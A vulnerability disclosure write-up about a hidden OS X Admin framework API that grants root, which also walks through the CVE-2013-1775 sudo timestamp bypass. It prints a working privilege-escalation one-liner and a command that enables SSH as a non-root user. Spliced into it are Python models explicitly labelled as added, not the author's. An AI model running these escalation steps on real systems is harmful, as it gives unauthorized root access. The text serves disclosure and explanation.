0x00 Summary

The Admin framework in Apple OS X contains a hidden API that can be used to obtain root privileges, in effect a backdoor. It has been there for years, at least since 2011. I found it in October 2014 and established that it can be used to escalate any user account on the system to root. The intended callers were probably the "System Preferences" application and the systemsetup command-line tool, but any user process can call the same functionality. Apple has just released OS X 10.10.3, which fixes the problem; OS X 10.9.x and earlier remain vulnerable, because Apple decided not to patch those versions. We recommend that all users upgrade to 10.10.3.

0x01 Demo

The first exploit I used was based on CVE-2013-1775, a sudo authentication bypass that was fixed in 10.8.5 (September 2013). The exploit code was very simple:

$ sudo -k;systemsetup -setusingnetworktime Off -settimezone GMT -setdate 01:01:1970 -settime 00:00;sudo su

(The command disables network time so the clock is not corrected, sets the time zone to GMT, and then sets the clock to the Unix epoch. In the affected sudo versions, sudo -k reset the user's sudo timestamp to the epoch instead of deleting it, so with the clock at the epoch the timestamp looks fresh and sudo su succeeds without a password.)

I discussed the exploit with my colleague Philip Åkesson, noting that it uses systemsetup to change the system time. We looked at the details of the fix together, and it turned out that besides fixing sudo, Apple had done one more thing: systemsetup was changed to require root. When run without root privileges on 10.8.5 and later it prints:

$ systemsetup
You need administrator access to run this tool... exiting!

The message is somewhat misleading, because we are in fact running with administrator privileges: the user account created during OS X installation is an admin by default. What the message really means is that the command requires root. Disassembling the binary in Hopper shows the check:

[screenshot: Hopper disassembly of the privilege check in systemsetup]

So the systemsetup binary simply checks whether it is running as root.
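The sudo bypass used in the exploit above relies on two facts: sudo -k used to set the timestamp file's mtime to the Unix epoch rather than removing it, and sudo judged freshness purely against the wall clock. The model below is an added example of that logic, not sudo's code and not code from this post; the timeout, the boot time and the "real" clock value are constructed scenario inputs, and the hardened check is a simplified model of the fix rather than the actual sudo 1.8.6p7 change.

```python
"""Model of the sudo timestamp logic behind CVE-2013-1775 (added example).

sudo remembers a successful password prompt by touching a per-user timestamp
file and skips the prompt while that file is "recent". Before sudo 1.8.6p7,
`sudo -k` did not delete the file; it set the mtime to the Unix epoch on the
assumption that the epoch is always too old to count. Moving the system clock
to the epoch (`systemsetup -settimezone GMT -setdate 01:01:1970 -settime
00:00` in the exploit above) makes that assumption false.
"""
from datetime import datetime, timedelta, timezone

EPOCH = datetime(1970, 1, 1, tzinfo=timezone.utc)
TIMEOUT = timedelta(minutes=5)          # sudo's default timestamp_timeout

# Constructed scenario values: the real wall-clock time and the boot time.
REAL_NOW = datetime(2013, 9, 1, 12, 0, tzinfo=timezone.utc)
BOOT_TIME = REAL_NOW - timedelta(hours=2)


def vulnerable_is_fresh(ts_mtime, now, boot_time=None):
    """Pre-fix check, simplified: the timestamp is honoured if it lies within
    TIMEOUT of the current wall-clock time and is not far in the future.
    boot_time is ignored; it exists only so both checks share a signature."""
    if ts_mtime > now + TIMEOUT:
        return False
    return now - ts_mtime < TIMEOUT


def hardened_is_fresh(ts_mtime, now, boot_time):
    """Simplified model of the fix: the epoch is a reset marker and is never
    fresh, and a timestamp written before the machine booted cannot belong
    to this session. (Real sudo additionally moved to a monotonic clock.)"""
    if ts_mtime <= EPOCH:
        return False
    if ts_mtime < boot_time:
        return False
    return vulnerable_is_fresh(ts_mtime, now)


def sudo_k_old():
    """What `sudo -k` did before the fix: mtime := epoch instead of unlink."""
    return EPOCH


def run_exploit(is_fresh):
    """Replays the exploit against the given check. Returns (before, after):
    whether sudo would skip the password before and after the clock change."""
    ts_mtime = sudo_k_old()                          # sudo -k
    before = is_fresh(ts_mtime, REAL_NOW, BOOT_TIME)
    clock = EPOCH                                    # systemsetup ... -setdate 01:01:1970 -settime 00:00
    after = is_fresh(ts_mtime, clock, BOOT_TIME)     # sudo su
    return before, after


if __name__ == "__main__":
    for name, check in (("vulnerable", vulnerable_is_fresh),
                        ("hardened", hardened_is_fresh)):
        before, after = run_exploit(check)
        print(f"{name}: password skipped before={before} after={after}")
```

The -settimezone GMT step matters: systemsetup sets local time, and only with the zone at GMT does 01:01:1970 00:00 land exactly on the epoch that sudo -k wrote into the file.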
With the function patched (the sete replaced by a setne) the tool runs again:

$ systemsetup
> systemsetup
> type -help for help.

So far we have only restored the behaviour of systemsetup before 10.8.5, when any user could run it. For example:

$ systemsetup -setremotelogin on

This turns on the SSH service on port 22. You could also do that with launchctl, but launchctl needs root, so there is a real difference in privileges here. The class name RemoteServerSettings suggests some kind of inter-process communication, which would explain how an operation that needs root can be performed from a non-root process. Note, too, that enabling SSH through System Preferences does not require root either.

I found this difference in privileges interesting, so I kept decompiling systemsetup. The setremotelogin command is implemented by a method called [ServerSettings setRemoteLogin:]. It does some input checking and then calls [InternetServices setSSHServerEnabled:], which lives in the Admin framework. Decompiling the Admin framework shows that setSSHServerEnabled: is far from the only method of the InternetServices interface. The full list:

+[InternetServices sharedInternetServices]
+[InternetServices sharedInternetServices].sSharedInternetServices
-[InternetServices netFSServerFrameworkBundle]
-[InternetServices _netFSServerFrameworkBundle].sNetFSServerkBundle
-[InternetServices _netFSServerFrameworkBundle].sNetFSServerkBundleOnce
-[InternetServices faxReceiveEnabled]
-[InternetServices ftpServerEnabled]
-[InternetServices httpdEnabled]
-[InternetServices isFTPServerAvailable]
-[InternetServices isFaxReceiveAvailable]
-[InternetServices isGuestForProtocolEnabled:]
-[InternetServices isHttpdAvailable]
-[InternetServices isNSCProtocolAvailable:]
-[InternetServices isNSCProtocolEnabled:]
-[InternetServices isNSServerShuttingDown:]
-[InternetServices isOpticalDiscSharingEnabled]
-[InternetServices isRemoteAEServerAvailable]
-[InternetServices isSSHServerAvailable]
-[InternetServices nscServerCancelShutdown:refNum:]
-[InternetServices nscServerShutdown:withDelay:]
-[InternetServices numberOfClientsForProtocols:]
-[InternetServices remoteAEServerEnabled]
-[InternetServices saveNatPrefs:]
-[InternetServices screensharingEnabled]
-[InternetServices sendSIGHUPToEfax]
-[InternetServices setFTPServerEnabled:]
-[InternetServices setFaxReceiveEnabled:]
-[InternetServices setGuestForProtocol:enabled:]
-[InternetServices setHttpdEnabled:]
-[InternetServices setInetDServiceEnabled:enabled:]
-[InternetServices setNSCProtocols:enabled:]
-[InternetServices setOpticalDiscSharingEnabled:]
-[InternetServices setRemoteAEServerEnabled:]
-[InternetServices setSSHServerEnabled:]
-[InternetServices setScreensharingEnabled:]
-[InternetServices sshServerEnabled]
_OBJC_CLASS$InternetServices
_OBJC_METACLASS$_InternetServices
___47-[InternetServices _netFSServerFrameworkBundle]_block_invoke

Some of them, for example setHttpdEnabled: and setSSHServerEnabled:, share a helper method, [ADMInternetServices setInetDServiceEnabled:enabled:]. Reading further in the Admin framework code, I found this:

[screenshot: decompiled Admin framework code that creates the per-user Apache configuration file]

The code appears to create a user-specific Apache configuration file for the guest account. Note that the file is owned by root:

$ ls -l /etc/apache2/users/
total 8
-rw-r--r--  1 root  wheel  139 Apr  1 05:49 std.conf

0x02 Finding the backdoor

The last Objective-C method called in the code above is createFileWithContents:path:attributes:. It takes an array of bytes (the file contents), a file path and a set of file attributes.
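The privilege difference found in 0x01 comes down to where the check sits: systemsetup tests its own uid (the sete that was flipped to setne), while the work that actually needs root is done elsewhere, behind the Admin framework. The model below is an added example of that boundary, not Apple's code and not code from this post. The Caller type, the two helper classes and the right name are hypothetical stand-ins for the privileged side; what they show is that a check in the client is bypassed both by patching the client and by not using the client at all, and that only a check made by the privileged side holds.

```python
"""Model of the privilege boundary described in the text (added example).

The systemsetup client checks its own uid, then hands the real work to a
privileged component. UncheckedHelper and AuthorizingHelper are hypothetical
stand-ins for that component; the Admin framework itself is not modelled.
"""
from dataclasses import dataclass

ADMIN_MESSAGE = "You need administrator access to run this tool... exiting!"


@dataclass(frozen=True)
class Caller:
    uid: int                          # uid of the calling process
    rights: frozenset = frozenset()   # authorization rights it has been granted


class UncheckedHelper:
    """Privileged side with no authorization of its own. It performs the
    operation for whoever reaches it, trusting that the client already
    checked."""
    def __init__(self):
        self.ssh_enabled = False

    def set_ssh_server_enabled(self, caller, enabled):
        self.ssh_enabled = enabled
        return True


class AuthorizingHelper(UncheckedHelper):
    """Privileged side that decides for itself, from facts about the caller
    it can verify: root, or a right obtained through authentication."""
    REQUIRED_RIGHT = "system.services.remotelogin"   # hypothetical right name

    def set_ssh_server_enabled(self, caller, enabled):
        if caller.uid != 0 and self.REQUIRED_RIGHT not in caller.rights:
            return False
        return super().set_ssh_server_enabled(caller, enabled)


def systemsetup_setremotelogin(caller, helper, enabled, patched=False):
    """Client side of `systemsetup -setremotelogin`. The uid test is the
    `sete` the text flips to `setne`; patched=True models the flipped binary,
    which lets non-root callers through (and blocks root)."""
    is_root = caller.uid == 0
    allowed = is_root != patched       # sete: allowed iff root; setne: inverted
    if not allowed:
        return ADMIN_MESSAGE
    if helper.set_ssh_server_enabled(caller, enabled):
        return "ok"
    return "denied by helper"


def demo(helper_cls):
    """Three ways an ordinary admin user (uid 501, not root) can try to enable
    SSH: the stock client, the patched client, and the helper called directly.
    Returns (stock result, patched result, direct-call result)."""
    user = Caller(uid=501)
    stock = systemsetup_setremotelogin(user, helper_cls(), True)
    patched = systemsetup_setremotelogin(user, helper_cls(), True, patched=True)
    direct = helper_cls().set_ssh_server_enabled(user, True)   # no client at all
    return stock, patched, direct


if __name__ == "__main__":
    print("unchecked helper:  ", demo(UncheckedHelper))
    print("authorizing helper:", demo(AuthorizingHelper))
```

With UncheckedHelper the stock client refuses, but the patched client and the direct call both succeed; with AuthorizingHelper only a root caller, or one holding the required right, gets through regardless of which client is used.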